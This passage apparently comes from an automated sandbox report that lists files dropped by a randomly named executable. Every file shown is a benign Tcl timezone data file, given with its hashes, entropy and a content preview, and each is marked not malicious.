                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:EST5EDT) {.. {-9223372036854775808 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-84387600 -14400 1 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.862365884559795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsPHV5XHAIgNGE7TRRL/yCh0DcPHy:SlSWB9vsM3y7fHAIgNTRN/yg0DH
                                                                                                                                                                                                                              MD5:ACD69F34396296BA553243267D06CEE0
                                                                                                                                                                                                                              SHA1:9575FFE5E7833B9532F17AC5413EA9DB23F07ECA
                                                                                                                                                                                                                              SHA-256:936B6484469351DEF8FAFE8EC180862729F5E43BDE4E53E2E9636E221B54C3C2
                                                                                                                                                                                                                              SHA-512:149D23FF35747127E9A2F4056D09472E8E689970BC795D5411C5BF621D949ADDEBDA68674D375A248A63106ABDFF6C54A8AFE5385C45BE2916CAED0C30F7C4A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Cairo)]} {.. LoadTimeZoneFile Africa/Cairo..}..set TZData(:Egypt) $TZData(:Africa/Cairo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.901791318009318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV5QH+o3vXHAIgoq6QHFRRL/yMQs/h8QanQHuv:SlSWB9vsM3ymnQeoPHAIgonQzN/yM/hm
                                                                                                                                                                                                                              MD5:E9C2C97EB65526F1D4BE1AD7385336FA
                                                                                                                                                                                                                              SHA1:09E4000CE320F779E2DFCA2FFD6B9258FFBA6CE4
                                                                                                                                                                                                                              SHA-256:B78A833337EFEC8B5F64622F1BFDA21FCB79CF290E9CF32A54B206EB20C6FDE9
                                                                                                                                                                                                                              SHA-512:EAEC097B58BF466CC7D6C0C6297628AF910CC308AC822565FD6CDABF96CD4EC57D4CC724FE782B6C1B606DFF9424013F6A890A871339577F7CB68BBB3C425E65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Dublin)]} {.. LoadTimeZoneFile Europe/Dublin..}..set TZData(:Eire) $TZData(:Europe/Dublin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                              Entropy (8bit):4.928744204623185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDMbNMXGm2OHvDwy:SlSWB9eg/yRQJDm2OHsy
                                                                                                                                                                                                                              MD5:9C08898081382F52CE681B592B8E2C8D
                                                                                                                                                                                                                              SHA1:165944424740B1FA9B4B3B8E622198ABD0BDA0F8
                                                                                                                                                                                                                              SHA-256:66B0DF8888883BFF44B18728B48CDF24AAED0BB745D601F3422C4F2D4063E0AC
                                                                                                                                                                                                                              SHA-512:86EA639F999169F2FBA2457BE5042463A1938031268CCA71FDD03CCBC6194932937BA58B49FBED461E055E9AA668FF6EBF391AA7EC603C0A425416DF2E6CC84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT) {.. {-9223372036854775808 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.910789466104329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDOm7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRSw8RQy
                                                                                                                                                                                                                              MD5:333F2BFA92742A49BB88F11C7CD896A9
                                                                                                                                                                                                                              SHA1:BB5BEC010C36427AEEBDDA2FB72083E22A3F5073
                                                                                                                                                                                                                              SHA-256:64466EA3759301E88C29AD1A833CDCBBC495EB4A5A3AC45E7B2987FECD6702BD
                                                                                                                                                                                                                              SHA-512:E2270F4B57C5F1C849726259B886E8644DCF497FA0D034AD48885146BEDC70DC8899900DA9AC01F2609A2DA881E10F9042CCBF75A3F5DA7344D7E92F1B070806
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.980500771169276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOveyXMXGm2OH1VOwVn:SlSWB9eg/yRSvPDm2OH1VOwV
                                                                                                                                                                                                                              MD5:A7C3FD06D1E06F125813C9687C42067C
                                                                                                                                                                                                                              SHA1:515622C0B63E977AFBFC78AD8466053C4A4A71A6
                                                                                                                                                                                                                              SHA-256:3BE1EC71D2CC88FA9A3DB7DC0476475F33FE5BCBE6BC35C0F083859766466C32
                                                                                                                                                                                                                              SHA-512:548DA608CFCA5B8539652F94CA2040D624602D2DF64B2C8CCDB8B219B9B384E01386CDF95F3BF77409DF0584FA12A3B73D56D13107D98BEB4C2555F458B3F374
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+1) {.. {-9223372036854775808 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.965033464829338
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOPFNMXGm2OH1VYU7vV:SlSWB9eg/yRSPXDm2OH1VYW9
                                                                                                                                                                                                                              MD5:FF71149E56D4CB553D0ED949B5F4C122
                                                                                                                                                                                                                              SHA1:3459B47E0EEC80D7A29512CA4F3F236C89E86573
                                                                                                                                                                                                                              SHA-256:E61E826E6FBC2396EF152640698098F4477D4FFDFE5F791F62250C3EC5865304
                                                                                                                                                                                                                              SHA-512:43B0CC8BD7F1EFC80C3F14F115D651EADD5743B17B854C2FB7AC25995138D3DF8792915C2952B80F35784A7115F8FB335ACE171479B24C668190AC175523DB21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+10) {.. {-9223372036854775808 -36000 0 -10}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):5.002239901486653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOeJMXGm2OHaBByVn:SlSWB9eg/yRSsDm2OHa7yV
                                                                                                                                                                                                                              MD5:08AABA917A8D6B3BB3D0DD1637F5ABFC
                                                                                                                                                                                                                              SHA1:D1D704F0250D4CBD450922A02D021E0000FBF5CF
                                                                                                                                                                                                                              SHA-256:143528946275DDC8B894218D3F1BE56C950F740828CEC13166C3D7E8E1B6BB7E
                                                                                                                                                                                                                              SHA-512:F37AE54864A613C830308CB94AB7CEA9534A86A53B52B4A2C28CEEFE6F5BC0518143AAFD77A6DA5EC55D392F5BD34FCD4B5BE51794B1A386ED783B9BA89C10C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+11) {.. {-9223372036854775808 -39600 0 -11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118
                                                                                                                                                                                                                              Entropy (8bit):4.97889339723103
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDONdNMXGm2OH3FNyUFFv:SlSWB9eg/yRSNDm2OH3XyMv
                                                                                                                                                                                                                              MD5:7374B66D6E883D7581E9561C3815EB92
                                                                                                                                                                                                                              SHA1:235E96A7420DF6733F3CA368D4A2D57766656043
                                                                                                                                                                                                                              SHA-256:A93EAFAC2C1089C608C8536127D0E8B53D8C7CFD13AE7DD69339E12A89F803C6
                                                                                                                                                                                                                              SHA-512:9BA59B17F20D65DFF1A5A2D557B535F69B04C172AECB15F88CA3484D74CC7D53894985C08653CF13D868BCBD5E7E5041E0CB2F457B5B603F3851198E552E33A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+12) {.. {-9223372036854775808 -43200 0 -12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.922268982357521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOcF3vFNMXGm2OHnFQVIyV:SlSWB9eg/yRS0fXDm2OHnFQVb
                                                                                                                                                                                                                              MD5:FDDC663E40F8FFFE27959E94625725DF
                                                                                                                                                                                                                              SHA1:EE3FBC1F6C8BBCF1BDC9E5DB4D2EA1A57E2E9BB3
                                                                                                                                                                                                                              SHA-256:AD5833153446960BDE0653A22AE2111BF80CFD61C3010993CE87B81D40C75C72
                                                                                                                                                                                                                              SHA-512:A1B2A153834FEAD7DC27C0918E1B1CB905671F82850C1CAAEBD89F5535703FB259F02F699EA7F82F3044E37668EE93DFA4D4EB862CD437AFF0DABA84867B1963
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+2) {.. {-9223372036854775808 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.949132511023475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOFfMXGm2OHBFVGAvFv:SlSWB9eg/yRSlDm2OHBFAKV
                                                                                                                                                                                                                              MD5:5C6F16F2CFD46030688066F9BFBE675D
                                                                                                                                                                                                                              SHA1:1DB5F36584822EB92E75B9AC9F440FD671BD90AE
                                                                                                                                                                                                                              SHA-256:C7BEE4C71905EDDB40BAF42C0CD0DC70BB9F298EAAB8B9367D484B8431DD084A
                                                                                                                                                                                                                              SHA-512:FFB2C4CD8EA7DE165C3D989454898FF2023D1A1E3B2B34EC23B1B71EFA7BF2538488DA0069E59F1152B8933D2263B762D2D7C56ADBED826C33FC0BA6672E34DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+3) {.. {-9223372036854775808 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.971627677226461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOqJMXGm2OHBvGQy:SlSWB9eg/yRSQDm2OHBON
                                                                                                                                                                                                                              MD5:E35244C1A6084C7BC1D79E437677C55C
                                                                                                                                                                                                                              SHA1:898619DA4B8B9AC72E69C7BD30DEA2ADEF9440FE
                                                                                                                                                                                                                              SHA-256:26D1EF512CC5797FC63BA2B83C7D6271025F4D4F5C904D9FA8E97F053393D9A7
                                                                                                                                                                                                                              SHA-512:0687758558C4C5FF7802F3A57212694A1515761A8337D4B75FFE81434D2AD8A221B005DEC36BF013F2FC3DE1E46DFBED36352811EB7C5A5AE3A167A2E314F57C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+4) {.. {-9223372036854775808 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.956438091983076
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOJNMXGm2OHLVvyV6Aov:SlSWB9eg/yRSDDm2OHLVKVg
                                                                                                                                                                                                                              MD5:7C560A0F3C42E399AC1247CB6C516DC6
                                                                                                                                                                                                                              SHA1:C314B09D4E369C69C23A8DC1FB066FD0CFDC7211
                                                                                                                                                                                                                              SHA-256:054910BDDFC44D9B806BBD3008C30547FA57ECD3C043418C406A725158144688
                                                                                                                                                                                                                              SHA-512:FCE8431B759BD5359847734FD98D9D91394916235B2AF587FC927D5F3196FB283E241A6A9200EA852F9265ECEF81402FF6ACD0FA3A4AAEF6DF9DB1B056B3A9EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+5) {.. {-9223372036854775808 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.974743300958087
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOAkSMXGm2OHvTmULyn:SlSWB9eg/yRSbSDm2OHviX
                                                                                                                                                                                                                              MD5:EEB1A3E0FD3339E332587D19C116D4EF
                                                                                                                                                                                                                              SHA1:5DBF046031CD354B1EF88E46D3FED74706D21AC6
                                                                                                                                                                                                                              SHA-256:D53BB247E0E429A6243AB9A9BDCAE1EE1CF5F271D79748A843631906AB63A988
                                                                                                                                                                                                                              SHA-512:07BDF9056DC335C773684E634B1D389FBD139464D4597DE862B7EAC096676A093934682BF911F4E68F299789931218C0E431F0CC6BEBD7275B5FC8015EDD0942
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+6) {.. {-9223372036854775808 -21600 0 -06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.930134062078826
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDONeyFNMXGm2OHrXVYVny:SlSWB9eg/yRSNPDm2OHriVy
                                                                                                                                                                                                                              MD5:F92B31548D6BF8CCFA326C0CA6E205A0
                                                                                                                                                                                                                              SHA1:3FFC6C214EDBCBE9C2509306CE73B429113E1C8A
                                                                                                                                                                                                                              SHA-256:6BA5779E35D581B409F53B14B6E28ECC16F536FFEDD45DDBC8DAE4B8C28F66E7
                                                                                                                                                                                                                              SHA-512:317872E986099D02AF083397AE936854043D54CEBF45A70672F02DDC9E2F3B27BC3FA80902F9675131C51A09BBD3C2BD1CD437330935CEA113C643769E0DF20C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+7) {.. {-9223372036854775808 -25200 0 -07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.915798027862021
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDOOF3vXMXGm2OHmFvGpn:SlSWB9eg/yRSqfXDm2OHaOp
                                                                                                                                                                                                                              MD5:B31B15E6006F8DF0D7627D6C90FF39AF
                                                                                                                                                                                                                              SHA1:7C4137BE11DA84771DF6DC5EBC32D5E5E87E060F
                                                                                                                                                                                                                              SHA-256:CA87559B154B165E83482AEE3D753BA8E38ABCA347A005E8504C566433CF4CB3
                                                                                                                                                                                                                              SHA-512:220F7E7379EABBC8ACD7ADBB7A4AC8E93E4B268F8F1C0965B7E6A09735EE86E293EF1C492990331EEB4176B8301A91EC20579756B962AE45C858A96C09349CCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+8) {.. {-9223372036854775808 -28800 0 -08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.95764928386407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDO3fMXGm2OHNms:SlSWB9eg/yRSPDm2OHNms
                                                                                                                                                                                                                              MD5:5B10173EB7119F1219250763504A3526
                                                                                                                                                                                                                              SHA1:A845021437C4638079040EF27AEF163C865FF8F8
                                                                                                                                                                                                                              SHA-256:A0987A1D078B0993FB3B07208E3F4538A2319DCDDDEB2FAEA32FC463DEAFB8DB
                                                                                                                                                                                                                              SHA-512:D213285D0A723B7771263122AFA269C2ABD0325A97D32C3870341255C06597DD6851C22860CFF42BF54E3FF5A36FC88C306F3BF1C69E7BD7FD7F69FE7601ED1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+9) {.. {-9223372036854775808 -32400 0 -09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.898210849752128
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDIyHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRUyJ8RQy
                                                                                                                                                                                                                              MD5:5AFB7F12BA056619252D48904523DFA9
                                                                                                                                                                                                                              SHA1:CD6E6681C8302BF38095975DF556BD14959FDAC8
                                                                                                                                                                                                                              SHA-256:EFF27B3DEE9306641FF344801E06BB33FF768CDCCFE2409FA8AF752FF6D39F66
                                                                                                                                                                                                                              SHA-512:2869BB347F42667A3D174816466B15916FC61FCB5A6A1BE1DD750C5C1751602FEE0FE5A27651B7A19C9F6764872DD0F00D3D5AA16CA1A743DBA09646D25A4EB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):115
                                                                                                                                                                                                                              Entropy (8bit):4.979902281541545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDI/fMXGm2OHMKUrn:SlSWB9eg/yRUXDm2OHtUr
                                                                                                                                                                                                                              MD5:4000096844091488200125FC8F50E2F5
                                                                                                                                                                                                                              SHA1:9FFEAE66405CFB254180C7DBE185288791DFEE5F
                                                                                                                                                                                                                              SHA-256:B4BF883FBE9246EF4079179A746B1F9E59F2C77D4F598794B60732D198DC6044
                                                                                                                                                                                                                              SHA-512:25C69E04018C2978A2E5748F0D3C61157453D998C16FA4B3C257A6515B87F5FD2B754893B47604BBC60AB60B60BA162BF2D1463E616E72CB8713C736F1B4D428
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-1) {.. {-9223372036854775808 3600 0 +01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.964101313797091
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDINFeyFNMXGm2OHMUUMy:SlSWB9eg/yRUN5XDm2OHXFy
                                                                                                                                                                                                                              MD5:AE6601FACF6BE1E68083F8D353901181
                                                                                                                                                                                                                              SHA1:8B3BFA307D2A94BADD3A1A5E42545D6F7C620BCE
                                                                                                                                                                                                                              SHA-256:EF3046D7789CAE069B5473D053F3EF0157248F8A359A1282EE02BA613A75FC94
                                                                                                                                                                                                                              SHA-512:1859E6A2CB94EFEE7CD5C17803AA4F2DEEBE4DCF43D3B1EA737DF00BA86ECEC79D296D75E69D5829DECB48380B6B650724104FFA7959FD18FE032DF7D002A88B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-10) {.. {-9223372036854775808 36000 0 +10}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):5.00162575418652
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIVSMXGm2OHlVVtyn:SlSWB9eg/yRUVSDm2OHlVLy
                                                                                                                                                                                                                              MD5:D864BA451C9E441BF47D233626C57B99
                                                                                                                                                                                                                              SHA1:6C38E6F8BA292575C496124572D187F97C9F8E73
                                                                                                                                                                                                                              SHA-256:CCDEADBD18BE81E59A669A460A14AFCBFF733C3A5D164FC2B6B93DEAF009B78A
                                                                                                                                                                                                                              SHA-512:5C16BD1189F3FE6789CB3630C841FD168EC87D0498EE6FCC4C8D635F8CF4BCAF0558B44F859C37E418F6BC5A7F6693D6EF1DD218A1DB6DA2D54FF55916685119
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-11) {.. {-9223372036854775808 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.978079707159482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRDIjbNMXGm2OHwvv0UIoAov:SlSWB9eg/yRUjJDm2OHwvv0YAov
                                                                                                                                                                                                                              MD5:C3E7748C7CB9D8A7F7FA5170D5098983
                                                                                                                                                                                                                              SHA1:54F5374A32173BEC6EDA430745DCD18749ABC233
                                                                                                                                                                                                                              SHA-256:23B61B18C653E25F7245B0BB6E04AD347E038585B145962FD1EEACE26F118D54
                                                                                                                                                                                                                              SHA-512:4783A7CD4C94CCC67C1C71F9C5D9CD99A3918EA4792D8CE2443ACE8F034B9023EBC02405B5DEAB919AA35FD1FD29D8980774316AC96D32ECDEBEFA15BBE6878D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-12) {.. {-9223372036854775808 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117
                                                                                                                                                                                                                              Entropy (8bit):4.994320173226919
                                                                                                                                                                                                                              Encrypted:false
